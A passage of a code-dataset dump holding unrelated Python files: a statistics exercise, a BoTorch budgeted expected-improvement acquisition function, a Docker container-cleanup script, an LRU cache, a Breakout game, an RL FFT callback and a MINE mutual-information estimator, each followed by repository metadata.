variance_a=variance_a, variance_b=variance_b)
print("\n---- 7 e)")
confidence = 0.8
m.t_test(confidence=confidence, n_a=n_a, n_b=n_b, x_a=x_a, x_b=x_b,
variance_a=variance_a, variance_b=variance_b, test_type="superior")
print("\n---- 7 f)")
# pegadinha
confidence = 0.95
p = 2/8
n = 8
m._intervalo_de_confianca_de_dois_lados_proporcao(confidence=confidence, p=p, n=n)
print("\n---- 8 a)")
a = [70,80,69,89,65,30,80,82,65,45]
b = [80,85,70,90,60,32,89,80,70,40]
m.observacoes_pareadas(confidence=confidence, a=a, b=b)
print("\n---- 8 b)")
confidence = 0.95
p = 7/10
n = 10
m._intervalo_de_confianca_de_um_lado_proporcao(p, confidence, n, type="inferior") | claudiocapanema/poi_gnn | foundation/util/lista1.py | lista1.py | py | 2,592 | python | en | code | 1 | github-code | 90 |
2503219521 | #!/usr/bin/env python3
# (c) Facebook, Inc. and its affiliates. Confidential and proprietary.
from __future__ import annotations
from typing import Any, Callable, Dict, List, Optional, Type, Union
import torch
from botorch.acquisition.acquisition import AcquisitionFunction
from botorch.acquisition.multi_step_lookahead import (
qMultiStepLookahead,
TAcqfArgConstructor,
_compute_stage_value,
_construct_sample_weights,
)
from botorch.acquisition.objective import AcquisitionObjective, ScalarizedObjective
from botorch.models.model import Model
from botorch.sampling.samplers import MCSampler, SobolQMCNormalSampler
from botorch.utils.transforms import (
t_batch_mode_transform,
)
from boss.acquisition_functions.budgeted_ei import (
BudgetedExpectedImprovement,
)
from boss.samplers.posterior_mean_sampler import PosteriorMeanSampler
from torch import Tensor
from torch.nn import Module
class BudgetedMultiStepExpectedImprovement(qMultiStepLookahead):
r"""Budgeted Multi-Step Look-Ahead Expected Improvement (one-shot optimization)."""
def __init__(
self,
model: Model,
cost_function: Callable,
budget: Union[float, Tensor],
num_fantasies: Optional[List[int]] = None,
samplers: Optional[List[MCSampler]] = None,
X_pending: Optional[Tensor] = None,
collapse_fantasy_base_samples: bool = True,
) -> None:
r"""Budgeted Multi-Step Expected Improvement.
Args:
model: .
cost_function: .
budget: A value determining the budget constraint.
batch_size: Batch size of the current step.
lookahead_batch_sizes: A list `[q_1, ..., q_k]` containing the batch sizes for the
`k` look-ahead steps.
num_fantasies: A list `[f_1, ..., f_k]` containing the number of fantasy
for the `k` look-ahead steps.
samplers: A list of MCSampler objects to be used for sampling fantasies in
each stage.
X_pending: A `m x d`-dim Tensor of `m` design points that have points that
have been submitted for function evaluation but have not yet been
evaluated. Concatenated into `X` upon forward call. Copied and set to
have no gradient.
collapse_fantasy_base_samples: If True, collapse_batch_dims of the Samplers
will be applied on fantasy batch dimensions as well, meaning that base
samples are the same in all subtrees starting from the same level.
"""
# TODO: This objective is never really used.
weights = torch.zeros(model.num_outputs, dtype=torch.double)
weights[0] = 1.0
objective = ScalarizedObjective(weights=weights)
lookahead_batch_sizes = [1 for _ in num_fantasies]
n_lookahead_steps = len(lookahead_batch_sizes) + 1
valfunc_cls = [BudgetedExpectedImprovement for _ in range(n_lookahead_steps)]
valfunc_argfacs = [budgeted_ei_argfac for _ in range(n_lookahead_steps)]
# Set samplers
if samplers is None:
# The batch_range is not set here and left to sampler default of (0, -2),
# meaning that collapse_batch_dims will be applied on fantasy batch dimensions.
# If collapse_fantasy_base_samples is False, the batch_range is updated during
# the forward call.
samplers: List[MCSampler] = [
PosteriorMeanSampler(collapse_batch_dims=True)
if nf == 1
else SobolQMCNormalSampler(
num_samples=nf, resample=False, collapse_batch_dims=True
)
for nf in num_fantasies
]
super().__init__(
model=model,
batch_sizes=lookahead_batch_sizes,
samplers=samplers,
valfunc_cls=valfunc_cls,
valfunc_argfacs=valfunc_argfacs,
objective=objective,
X_pending=X_pending,
collapse_fantasy_base_samples=collapse_fantasy_base_samples,
)
self.cost_function = cost_function
self.budget = budget
@t_batch_mode_transform()
def forward(self, X: Tensor) -> Tensor:
r"""Evaluate qMultiStepLookahead on the candidate set X.
Args:
X: A `batch_shape x q' x d`-dim Tensor with `q'` design points for each
batch, where `q' = q_0 + f_1 q_1 + f_2 f_1 q_2 + ...`. Here `q_i`
is the number of candidates jointly considered in look-ahead step
`i`, and `f_i` is respective number of fantasies.
Returns:
The acquisition value for each batch as a tensor of shape `batch_shape`.
"""
Xs = self.get_multi_step_tree_input_representation(X)
# set batch_range on samplers if not collapsing on fantasy dims
if not self._collapse_fantasy_base_samples:
self._set_samplers_batch_range(batch_shape=X.shape[:-2])
return _step(
model=self.model,
cost_function=self.cost_function,
Xs=Xs,
samplers=self.samplers,
valfunc_cls=self._valfunc_cls,
valfunc_argfacs=self._valfunc_argfacs,
inner_samplers=self.inner_samplers,
objective=self.objective,
budget=self.budget,
running_val=None,
)
def _step(
model: Model,
cost_function: Callable,
Xs: List[Tensor],
samplers: List[Optional[MCSampler]],
valfunc_cls: List[Optional[Type[AcquisitionFunction]]],
valfunc_argfacs: List[Optional[TAcqfArgConstructor]],
inner_samplers: List[Optional[MCSampler]],
objective: AcquisitionObjective,
budget: Tensor,
running_val: Optional[Tensor] = None,
sample_weights: Optional[Tensor] = None,
step_index: int = 0,
) -> Tensor:
r"""Recursive multi-step look-ahead computation.
Helper function computing the "value-to-go" of a multi-step lookahead scheme.
Args:
model: A Model of appropriate batch size. Specifically, it must be possible to
evaluate the model's posterior at `Xs[0]`.
Xs: A list `[X_j, ..., X_k]` of tensors, where `X_i` has shape
`f_i x .... x f_1 x batch_shape x q_i x d`.
samplers: A list of `k - j` samplers, such that the number of samples of sampler
`i` is `f_i`. The last element of this list is considered the
"inner sampler", which is used for evaluating the objective in case it is an
MCAcquisitionObjective.
valfunc_cls: A list of acquisition function class to be used as the (stage +
terminal) value functions. Each element (except for the last one) can be
`None`, in which case a zero stage value is assumed for the respective
stage.
valfunc_argfacs: A list of callables that map a `Model` and input tensor `X` to
a dictionary of kwargs for the respective stage value function constructor.
If `None`, only the standard `model`, `sampler` and `objective` kwargs will
be used.
inner_samplers: A list of `MCSampler` objects, each to be used in the stage
value function at the corresponding index.
objective: The AcquisitionObjective under which the model output is evaluated.
running_val: As `batch_shape`-dim tensor containing the current running value.
sample_weights: A tensor of shape `f_i x .... x f_1 x batch_shape` when called
in the `i`-th step by which to weight the stage value samples. Used in
conjunction with Gauss-Hermite integration or importance sampling. Assumed
to be `None` in the initial step (when `step_index=0`).
step_index: The index of the look-ahead step. `step_index=0` indicates the
initial step.
Returns:
A `b`-dim tensor containing the multi-step value of the design `X`.
"""
# print(step_index)
X = Xs[0]
if sample_weights is None: # only happens in the initial step
sample_weights = torch.ones(*X.shape[:-2], device=X.device, dtype=X.dtype)
# compute stage value
stage_val = _compute_stage_value(
model=model,
valfunc_cls=valfunc_cls[0],
X=X,
objective=objective,
inner_sampler=inner_samplers[0],
arg_fac=valfunc_argfacs[0](cost_function, budget),
)
if stage_val is not None: # update running value
# if not None, running_val has shape f_{i-1} x ... x f_1 x batch_shape
# stage_val has shape f_i x ... x f_1 x batch_shape
# this sum will add a dimension to running_val so that
# updated running_val has shape f_i x ... x f_1 x batch_shape
running_val = stage_val if running_val is None else running_val + stage_val
# base case: no more fantasizing, return value
if len(Xs) == 1:
# compute weighted average over all leaf nodes of the tree
batch_shape = running_val.shape[step_index:]
# expand sample weights to make sure it is the same shape as running_val,
# because we need to take a sum over sample weights for computing the
# weighted average
sample_weights = sample_weights.expand(running_val.shape)
return (running_val * sample_weights).view(-1, *batch_shape).sum(dim=0)
# construct fantasy model (with batch shape f_{j+1} x ... x f_1 x batch_shape)
prop_grads = step_index > 0 # need to propagate gradients for steps > 0
fantasy_model = model.fantasize(
X=X, sampler=samplers[0], observation_noise=True, propagate_grads=prop_grads
)
# augment sample weights appropriately
sample_weights = _construct_sample_weights(
prev_weights=sample_weights, sampler=samplers[0]
)
# update budget
new_budget = budget - cost_function(X)
# update cost function
new_cost_function = cost_function.update_reference_point(X)
return _step(
model=fantasy_model,
cost_function=new_cost_function,
Xs=Xs[1:],
samplers=samplers[1:],
valfunc_cls=valfunc_cls[1:],
valfunc_argfacs=valfunc_argfacs[1:],
inner_samplers=inner_samplers[1:],
objective=objective,
budget=new_budget,
running_val=running_val,
sample_weights=sample_weights,
step_index=step_index + 1,
)
class budgeted_ei_argfac(Module):
r"""Extract the best observed value and reamaining budget from the model."""
def __init__(self, cost_function: Callable, budget: Union[float, Tensor]) -> None:
super().__init__()
self.cost_function = cost_function
self.budget = budget
def forward(self, model: Model, X: Tensor) -> Dict[str, Any]:
obj_vals_transformed = model.train_targets
obj_vals = model.outcome_transform.untransform(obj_vals_transformed)[0]
params = {
"cost_function": self.cost_function,
"best_f": obj_vals.max(dim=-1, keepdim=True).values,
"budget": self.budget,
}
return params
| RaulAstudillo06/BOSS | boss/acquisition_functions/budgeted_multi_step_ei.py | budgeted_multi_step_ei.py | py | 11,139 | python | en | code | 1 | github-code | 90 |
12570891610 | import docker
from datetime import datetime
import time
client = docker.from_env()
print("Let the killing begin :]")
while True:
# print("ein neuer zyklus beginnt")
# check all containers on the host
for container in client.containers.list():
# print("scanning...found:", container.name)
if 'DeathDate' in container.attrs['Config']['Labels']:
# get the deathdate label of the containers in order to shut them down
DeathDate = datetime.strptime(container.attrs['Config']['Labels']['DeathDate'], '%Y-%m-%d %H:%M:%S')
if datetime.now() > DeathDate:
container.stop()
container.remove()
print("stopped and removed:", container.name)
# also remove all persistent volumes
for mount in [client.volumes.get(volume['Name']) for volume in container.attrs['Mounts']]:
mount.remove()
print("removed volume:",mount)
# remove orphaned networks
client.networks.prune()
time.sleep(60) | LindezaGrey/docker-reaper | Reaper.py | Reaper.py | py | 1,308 | python | en | code | 0 | github-code | 90 |
74798874216 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.autograd as autograd
from .pytorchtools import EarlyStopping
import numpy as np
from sklearn.model_selection import train_test_split
# from .DiscreteCondEnt import subset
import os
from ..util import plot_util
# from ..utils import save_train_curve
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.animation as animation
def save_train_curve(train_loss, valid_loss, figName):
# visualize the loss as the network trained
fig = plt.figure(figsize=(10,8))
plt.plot(range(1,len(train_loss)+1),train_loss, label='Training Loss')
plt.plot(range(1,len(valid_loss)+1),valid_loss,label='Validation Loss')
# find position of lowest validation loss
minposs = valid_loss.index(min(valid_loss))+1
plt.axvline(minposs, linestyle='--', color='r',label='Early Stopping Checkpoint')
plt.xlabel('epochs')
plt.ylabel('loss')
plt.xlim(0, len(train_loss)+1) # consistent scale
plt.grid(True)
plt.legend()
plt.tight_layout()
fig.savefig(figName, bbox_inches='tight')
plt.close()
def sample_batch(data, resp=0, cond=[1], batch_size=100, sample_mode='marginal'):
"""[summary]
Arguments:
data {[type]} -- [N X 2]
resp {[int]} -- [description]
cond {[list]} -- [1 dimension]
Keyword Arguments:
batch_size {int} -- [description] (default: {100})
randomJointIdx {bool} -- [description] (default: {True})
Returns:
[batch_joint] -- [batch size X 2]
[batch_mar] -- [batch size X 2]
"""
if type(cond)==list:
whole = cond.copy()
whole.append(resp)
else:
raise TypeError("cond should be list")
if sample_mode == 'joint':
index = np.random.choice(range(data.shape[0]), size=batch_size, replace=False)
batch = data[index]
batch = batch[:, whole]
elif sample_mode == 'unif':
dataMax = data.max(axis=0)[whole]
dataMin = data.min(axis=0)[whole]
batch = (dataMax - dataMin)*np.random.random((batch_size,len(cond)+1)) + dataMin
elif sample_mode == 'marginal':
joint_index = np.random.choice(range(data.shape[0]), size=batch_size, replace=False)
marginal_index = np.random.choice(range(data.shape[0]), size=batch_size, replace=False)
batch = np.concatenate([data[joint_index][:,resp].reshape(-1,1), data[marginal_index][:,cond].reshape(-1,len(cond))], axis=1)
else:
raise ValueError('Sample mode: {} not recognized.'.format(sample_mode))
return batch
class MineNet(nn.Module):
def __init__(self, input_size=2, hidden_size=100):
super().__init__()
self.fc1 = nn.Linear(input_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, 1)
nn.init.normal_(self.fc1.weight,std=0.02)
nn.init.constant_(self.fc1.bias, 0)
nn.init.normal_(self.fc2.weight,std=0.02)
nn.init.constant_(self.fc2.bias, 0)
nn.init.normal_(self.fc3.weight,std=0.02)
nn.init.constant_(self.fc3.bias, 0)
def forward(self, input):
output = F.elu(self.fc1(input))
output = F.elu(self.fc2(output))
output = self.fc3(output)
return output
class Mine():
def __init__(self, lr, batch_size, patience=int(20), iter_num=int(1e+3), log_freq=int(100), avg_freq=int(10), ma_rate=0.01, verbose=True, resp=0, cond=[1], log=True, sample_mode='marginal', y_label=""):
self.lr = lr
self.batch_size = batch_size
self.patience = patience # 20
self.iter_num = iter_num # 1e+3
self.log_freq = int(log_freq) # int(1e+2)
self.avg_freq = avg_freq # int(1e+1)
self.ma_rate = ma_rate # 0.01
self.prefix = ''
self.verbose = verbose
self.resp = resp
self.cond = cond
self.log = log
self.sample_mode = sample_mode
self.model_name = ""
self.ground_truth = None
self.paramName = None
if sample_mode == "marginal":
self.y_label = "I(X^Y)"
elif sample_mode == "unif":
self.y_label = "HXY"
else:
self.y_label = y_label
self.heatmap_frames = [] # for plotting heatmap animation
self.mine_net = MineNet(input_size=len(self.cond)+1)
self.mine_net_optim = optim.Adam(self.mine_net.parameters(), lr=self.lr)
def fit(self, train_data, val_data):
self.Xmin = min(train_data[:,0])
self.Xmax = max(train_data[:,0])
self.Ymin = min(train_data[:,1])
self.Ymax = max(train_data[:,1])
if self.log:
log_file = os.path.join(self.prefix, "MINE_train.log")
log = open(log_file, "w")
log.write("batch_size={0}\n".format(self.batch_size))
log.write("iter_num={0}\n".format(self.iter_num))
log.write("log_freq={0}\n".format(self.log_freq))
log.write("avg_freq={0}\n".format(self.avg_freq))
log.write("patience={0}\n".format(self.patience))
log.close()
heatmap_animation_fig, heatmap_animation_ax = plt.subplots(1, 1)
# data is x or y
result = list()
self.ma_et = 1. # exponential of mi estimation on marginal data
#Early Stopping
train_mi_lb = []
valid_mi_lb = []
self.avg_train_mi_lb = []
self.avg_valid_mi_lb = []
earlyStop = EarlyStopping(patience=self.patience, verbose=self.verbose, prefix=self.prefix)
for i in range(self.iter_num):
#get train data
batchTrain = sample_batch(train_data, resp= self.resp, cond= self.cond, batch_size=self.batch_size, sample_mode='joint'), \
sample_batch(train_data, resp= self.resp, cond= self.cond, batch_size=self.batch_size, sample_mode=self.sample_mode)
mi_lb, lossTrain = self.update_mine_net(batchTrain, self.mine_net_optim)
result.append(mi_lb.detach().cpu().numpy())
train_mi_lb.append(mi_lb.item())
if self.verbose and (i+1)%(self.log_freq)==0:
print(result[-1])
mi_lb_valid = self.forward_pass(val_data)
valid_mi_lb.append(mi_lb_valid.item())
if (i+1)%(self.avg_freq)==0:
train_loss = - np.average(train_mi_lb)
valid_loss = - np.average(valid_mi_lb)
self.avg_train_mi_lb.append(train_loss)
self.avg_valid_mi_lb.append(valid_loss)
if self.verbose:
print_msg = "[{0}/{1}] train_loss: {2} valid_loss: {3}".format(i, self.iter_num, train_loss, valid_loss)
print (print_msg)
train_mi_lb = []
valid_mi_lb = []
earlyStop(valid_loss, self.mine_net)
if (earlyStop.early_stop):
if self.verbose:
print("Early stopping")
break
# if self.log:
# x = np.linspace(self.Xmin, self.Xmax, 300)
# y = np.linspace(self.Ymin, self.Ymax, 300)
# xs, ys = np.meshgrid(x,y)
# t = self.mine_net(torch.FloatTensor(np.hstack((xs.flatten()[:,None],ys.flatten()[:,None])))).detach().numpy()
# t = t.reshape(xs.shape[1], ys.shape[0])
# # ixy = t - np.log(self.ma_et.mean().detach().numpy())
# heatmap_animation_ax, c = plot_util.getHeatMap(heatmap_animation_ax, xs, ys, t)
# self.heatmap_frames.append((c,))
if self.log:
# writer = animation.writers['ffmpeg'](fps=1, bitrate=1800)
# heatmap_animation = animation.ArtistAnimation(heatmap_animation_fig, self.heatmap_frames, interval=200, blit=False)
# heatmap_animation.save(os.path.join(self.prefix, 'heatmap.mp4'), writer=writer)
#Save result to files
avg_train_mi_lb = np.array(self.avg_train_mi_lb)
np.savetxt(os.path.join(self.prefix, "avg_train_mi_lb.txt"), avg_train_mi_lb)
avg_valid_mi_lb = np.array(self.avg_valid_mi_lb)
np.savetxt(os.path.join(self.prefix, "avg_valid_mi_lb.txt"), avg_valid_mi_lb)
ch = os.path.join(self.prefix, "checkpoint.pt")
self.mine_net.load_state_dict(torch.load(ch))#'checkpoint.pt'))
def update_mine_net(self, batch, mine_net_optim, ma_rate=0.01):
"""[summary]
Arguments:
batch {[type]} -- ([batch_size X 2], [batch_size X 2])
mine_net_optim {[type]} -- [description]
ma_rate {float} -- [moving average rate] (default: {0.01})
Keyword Arguments:
mi_lb {} -- []
"""
# batch is a tuple of (joint, marginal)
joint , marginal = batch
joint = torch.autograd.Variable(torch.FloatTensor(joint))
marginal = torch.autograd.Variable(torch.FloatTensor(marginal))
mi_lb , t, et = self.mutual_information(joint, marginal)
self.ma_et = (1-ma_rate)*self.ma_et + ma_rate*torch.mean(et)
# unbiasing use moving average
loss = -(torch.mean(t) - (1/self.ma_et.mean()).detach()*torch.mean(et))
# use biased estimator
# loss = - mi_lb
lossTrain = loss
mine_net_optim.zero_grad()
autograd.backward(loss)
mine_net_optim.step()
return mi_lb, lossTrain
def mutual_information(self, joint, marginal):
t = self.mine_net(joint)
et = torch.exp(self.mine_net(marginal))
mi_lb = torch.mean(t) - torch.log(torch.mean(et))
return mi_lb, t, et
def forward_pass(self, X):
joint = sample_batch(X, resp= self.resp, cond= self.cond, batch_size=X.shape[0], sample_mode='joint')
marginal = sample_batch(X, resp= self.resp, cond= self.cond, batch_size=X.shape[0], sample_mode=self.sample_mode)
joint = torch.autograd.Variable(torch.FloatTensor(joint))
marginal = torch.autograd.Variable(torch.FloatTensor(marginal))
mi_lb , t, et = self.mutual_information(joint, marginal)
return mi_lb
def predict(self, X):
"""[summary]
Arguments:
X {[numpy array]} -- [N X 2]
Return:
mutual information estimate
"""
self.X = X
X_train, X_test = train_test_split(X, test_size=0.35, random_state=0)
self.fit(X_train, X_test)
mi_lb = self.forward_pass(X_test).item()
if self.log:
self.savefig(X, mi_lb)
if self.sample_mode == 'unif':
if 0 == len(self.cond):
X_max, X_min = X[:,self.resp].max(axis=0), X[:,self.resp].min(axis=0)
cross = np.log(X_max-X_min)
else:
X_max, X_min = X.max(axis=0), X.min(axis=0)
cross = sum(np.log(X_max-X_min))
return cross - mi_lb
return mi_lb
def savefig(self, X, ml_lb_estimate):
if len(self.cond) > 1:
raise ValueError("Only support 2-dim or 1-dim")
fig, ax = plt.subplots(1,4, figsize=(90, 15))
#plot Data
ax[0].scatter(X[:,self.resp], X[:,self.cond], color='red', marker='o')
#plot training curve
ax[1] = plot_util.getTrainCurve(self.avg_train_mi_lb, self.avg_valid_mi_lb, ax[1])
# Trained Function contour plot
Xmin = min(X[:,0])
Xmax = max(X[:,0])
Ymin = min(X[:,1])
Ymax = max(X[:,1])
x = np.linspace(Xmin, Xmax, 300)
y = np.linspace(Ymin, Ymax, 300)
xs, ys = np.meshgrid(x,y)
z = self.mine_net(torch.FloatTensor(np.hstack((xs.flatten()[:,None],ys.flatten()[:,None])))).detach().numpy()
z = z.reshape(xs.shape[1], ys.shape[0])
ax[2], c = plot_util.getHeatMap(ax[2], xs, ys, z)
fig.colorbar(c, ax=ax[2])
ax[2].set_title('heatmap')
# Plot result with ground truth
ax[3].scatter(0, self.ground_truth, edgecolors='red', facecolors='none', label='Ground Truth')
ax[3].scatter(0, ml_lb_estimate, edgecolors='green', facecolors='none', label=self.model_name)
ax[3].set_xlabel(self.paramName)
ax[3].set_ylabel(self.y_label)
ax[3].legend()
figName = os.path.join(self.prefix, "MINE")
fig.savefig(figName, bbox_inches='tight')
plt.close()
| handasontam/MMI | model/mine.py | mine.py | py | 12,635 | python | en | code | 1 | github-code | 90 |
22678561230 | #Daniel Torres
#PSID:1447167
#HW 2: part b
#part b
def main(date):
month_of_number = {"January":1,"February":2,"March":3,"April":4,"May":5,"June":6,"July":7,
"August":8,"September":9,"October":10,"Novenber":11,"December":12}
try:
year = date.split(",")[-1].strip()
month = date.split(",")[0].split()[0]
day = date.split(",")[0].split()[-1]
month_number = month_of_number[month]
int(year)
int(day)
return str(month_number)+"/"+day+"/"+year
except:
return ""
with open("inputDates.txt") as f:
for x in f.readlines():
if x.strip() != "-1":
print(main(x.strip()))
| datorre5/CIS2348-FALL2020 | HW2partB.py | HW2partB.py | py | 654 | python | en | code | 0 | github-code | 90 |
18567805529 | import sys
input = sys.stdin.buffer.readline
def main():
N = int(input())
a = list(map(int,input().split()))
b = list(map(int,input().split()))
if sum(a) > sum(b):
print("No")
else:
do = sum(b)-sum(a)
ca,cb = 0,0
for x,y in zip(a,b):
if x > y:
cb += x-y
else:
if (y-x)%2 == 0:
ca += (y-x)//2
else:
ca += (y+1-x)//2
cb += 1
if ca-cb >= 0:
print("Yes")
else:
print("No")
if __name__ == "__main__":
main()
| Aasthaengg/IBMdataset | Python_codes/p03438/s000749453.py | s000749453.py | py | 638 | python | en | code | 0 | github-code | 90 |
8402230971 | #!/usr/bin/env python3
""" LRUCache module
"""
from base_caching import BaseCaching
class LRUCache(BaseCaching):
""" Inherits from BaseCaching and is a LRU cache
"""
def __init__(self):
super().__init__()
self.lru_order = []
def put(self, key, item):
""" Add item to cache data """
if key and item:
if key in self.cache_data:
self.lru_order.remove(key)
self.lru_order.append(key)
self.cache_data[key] = item
if len(self.cache_data) > BaseCaching.MAX_ITEMS:
print("DISCARD: {}".format(self.lru_order[0]))
self.cache_data.pop(self.lru_order[0])
self.lru_order.pop(0)
def get(self, key):
""" Get item from cache data """
if key is None or key not in self.cache_data:
return None
self.lru_order.remove(key)
self.lru_order.append(key)
return self.cache_data[key]
| Cyril-777/alx-backend | 0x01-caching/3-lru_cache.py | 3-lru_cache.py | py | 980 | python | en | code | 0 | github-code | 90 |
23271749193 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import xml.etree.cElementTree as ET
import pprint
import re
import codecs
import json
from audit_street import update_name
lower = re.compile(r'^([a-z]|_)*$')
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
CREATED = ["version", "changeset", "timestamp", "user", "uid"]
mapping = {"St": "Street",
"St.": "Street",
"Rd": "Road",
"Ave": "Avenue"
}
def shape_element(element):
node = {}
created = {}
address = {}
if element.tag == "node" or element.tag == "way":
if element.tag == "way":
node_refs = []
for nd in element.iter("nd"):
node_refs.append(nd.get('ref'))
node["node_refs"] = node_refs
elif element.tag == "node":
pos = []
pos.append(element.get('lat'))
pos.append(element.get('lon'))
node['pos'] = pos
for dkey, dval in element.items():
if problemchars.search(dval):
pass
elif dkey in CREATED:
created[dkey] = dval
node["created"] = created.copy()
else:
node[dkey] = element.get(dkey)
node["type"] = element.tag
for tag in element.iter("tag"):
if problemchars.search(tag.attrib["k"]):
pass
#elif tag.attrib["k"].startswith("is_in"):
# tag.attriv["k"]="city"
elif tag.attrib["k"].startswith("addr:"):
if tag.attrib["k"].startswith("addr:street"):
tag.attrib["v"] = update_name(tag.attrib["v"], mapping)
# print set(tag.attrib['v'])
if tag.attrib["k"].count(":") == 1:
tag.attrib["k"] = tag.attrib["k"].replace("addr:", "")
address[tag.attrib["k"]] = tag.attrib["v"]
node["address"] = address.copy()
else:
pass
# tag.attrib["v"]=""
# tag.attrib["k"]=tag.attrib["k"].replace("addr:","adress:")
# if tag==
else:
node[tag.attrib["k"]] = tag.attrib["v"]
return node
else:
return None
def process_map(file_in, pretty = False):
# You do not need to change this file
file_out = "{0}.json".format(file_in)
data = []
with codecs.open(file_out, "w") as fo:
fo.write("[")
for _, element in ET.iterparse(file_in):
el = shape_element(element)
if el:
data.append(el)
fo.write(json.dumps(el)+"," + "\n")
fo.write("]")
# make sure please to delete ',' from the end of the osm file or the insertion of the data into mongodb won't work
return data
def test():
data = process_map('southampton.osm', True)
if __name__ == "__main__":
test()
| mouna199/project_udacity | create_json.py | create_json.py | py | 3,004 | python | en | code | 0 | github-code | 90 |
29134655454 | from msilib.schema import Error
from gym import Env
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common.buffers import ReplayBuffer
from scipy.fft import fft, fftfreq, fftn
from typing import Tuple
import matplotlib.pyplot as plt
import numpy as np
class FFTEvalCallback(BaseCallback):
def __init__(self, eval_env: Env, verbose: int = 0, ):
super().__init__(verbose)
self.env = eval_env
self.data = []
self.n_dones = -1
self.EVAL_EVERY = 10
self.EVAL_ROLLOUTS = 10
def _on_step(self) -> None:
if sum(self.locals["dones"]) > 0:
self.n_dones = self.n_dones + 1
if self.n_dones % self.EVAL_EVERY == 0:
yf_list = []
for _ in range(self.EVAL_ROLLOUTS):
actions, rewards = self._do_rollout()
data = np.squeeze(rewards)
N = len(data)
yf = fft(data)
yf = 2.0/N * np.abs(yf[0:N//2])
yf_list.append(yf)
yf_m, yf_std = np.mean(yf_list, axis=0), np.std(yf_list, axis=0)
T = self.env.dt
xf = fftfreq(N, T)[:N//2]
self.data.append((xf, yf_m, yf_std))
for i, (xf, yf_m, yf_std) in enumerate(self.data):
plt.plot(xf, yf_m, label='Episode ' + str(i*self.EVAL_EVERY))
plt.fill_between(xf, yf_m-yf_std, yf_m+yf_std, alpha=0.4)
plt.grid()
plt.legend()
plt.xlabel("Frequency [Hz]")
plt.ylabel("Rewards [-]")
plt.show()
return super()._on_step()
def _do_rollout(self):
obs = self.env.reset()
done, state = False, None
actions = []
rewards = []
while not done:
action, state = self.locals['self'].predict(obs, state=state, deterministic=False)
actions.append(action)
obs, reward, done, info = self.env.step(action)
rewards.append(reward)
return actions, rewards | AlexanderKeijzer/experience-selection-drl | callback_fft_eval.py | callback_fft_eval.py | py | 2,152 | python | en | code | 0 | github-code | 90 |
35859386375 | """
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao.
"""
from campy.gui.events.timer import pause
from breakoutgraphics import BreakoutGraphics
FRAME_RATE = 2000 / 120 # 120 frames per second
NUM_LIVES = 3 # Number of attempts
def main():
graphics = BreakoutGraphics()
dx = graphics.get_dx()
dy = graphics.get_dy()
# Add animation loop here!
num_lives = NUM_LIVES
while True:
if num_lives <= 0 or graphics.no_brick_left():
break
if graphics.ball_move: # The ball will start to move after mouse clicked
# update
graphics.ball.move(dx, dy)
# check
if graphics.hit_the_walls():
dx = -dx
if graphics.hit_the_ceiling():
dy = -dy
if graphics.touch_paddle and dy > 0: # To avoid the ball bouncing repeatedly on the paddle
dx = graphics.get_dx() # To change the dx every collision happened
dy = -dy
if graphics.brick_collision_happened():
dx = graphics.get_dx() # To change the dx every collision happened
dy = -dy
if graphics.lose_a_life():
num_lives -= 1
# pause
pause(FRAME_RATE)
if __name__ == '__main__':
main()
| tungtunghung/mystanCodeproject | mystanCodeprojects/break_out_game/breakout.py | breakout.py | py | 1,380 | python | en | code | 0 | github-code | 90 |
18502823199 | import bisect
N, K = map(int,input().split())
X = list(map(int,input().split()))
s = bisect.bisect_left(X,0)
if 0 in X:
K -= 1
else:
bisect.insort_left(X,0)
N += 1
MIN = 2 * 10**9
for i in range(K+1):
if s - K + i >= 0 and s + i <N:
f = X[s -K+i]
l = X[s+i]
if abs(f) < abs(l):
ans = abs(f) * 2 + abs(l)
else:
ans = abs(l) * 2 + abs(f)
MIN =min(MIN,ans)
print(MIN) | Aasthaengg/IBMdataset | Python_codes/p03274/s538877271.py | s538877271.py | py | 448 | python | en | code | 0 | github-code | 90 |
18135896439 | def chess(h,w):
if (h+w) % 2 == 0:
return '#'
return '.'
while True:
H, W = map(int, input().split())
if H == 0 and W == 0:
break
for i in range(H):
for j in range(W):
print(chess(i,j), end='')
print()
print()
| Aasthaengg/IBMdataset | Python_codes/p02405/s821293644.py | s821293644.py | py | 246 | python | en | code | 0 | github-code | 90 |
26256702311 | from typing import Any
lista = []
maior=0
menor=0
soma=0
print ("Tigite 20 números: ")
while len(lista) < 20:
item = (int(input()))
lista.append(item)
for i in lista:
soma += i
print("A média dos números digitados é: ", soma /20)
for i in range(len(lista)):
if i == 0:
maior = menor = lista[i]
else:
if lista[i]> maior:
maior = lista[i]
if lista[i] < menor:
menor = lista[i]
print("O maior valor é:", maior)
print("O menor valor é:", menor) | LSFagundes/SENAI---Programacao-de-Aplicativos | EXERCICIO-3.py | EXERCICIO-3.py | py | 525 | python | pt | code | 0 | github-code | 90 |
17967914009 | import sys
from collections import defaultdict
from heapq import heappush, heappop
def input():
return sys.stdin.readline().strip()
def dijkstra(adj_list, start):
n = len(adj_list)
dist = [float("inf")] * n
dist[start] = 0
pq = []
heappush(pq, (0, start))
visited = set()
while pq:
w, v = heappop(pq)
if dist[v] < w:
continue
visited.add(v)
for nv, nw in adj_list[v]:
if nv in visited:
continue
if dist[nv] > dist[v] + nw:
dist[nv] = dist[v] + nw
heappush(pq, (dist[nv], nv))
return dist
N = int(input())
g = defaultdict(list)
for _ in range(N - 1):
a, b, c = map(int, input().split())
a -= 1
b -= 1
g[a].append((b, c))
g[b].append((a, c))
Q, K = map(int, input().split())
K -= 1
d = dijkstra(g, K)
ans = []
for _ in range(Q):
x, y = map(int, input().split())
x -= 1
y -= 1
print(d[x] + d[y])
| Aasthaengg/IBMdataset | Python_codes/p03634/s800994110.py | s800994110.py | py | 988 | python | en | code | 0 | github-code | 90 |
71344776618 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import seaborn as sns
from sklearn import linear_model
# In[2]:
def read_data(file):
return pd.read_csv(file)
# In[5]:
miami = read_data('miami_full.csv')
# In[7]:
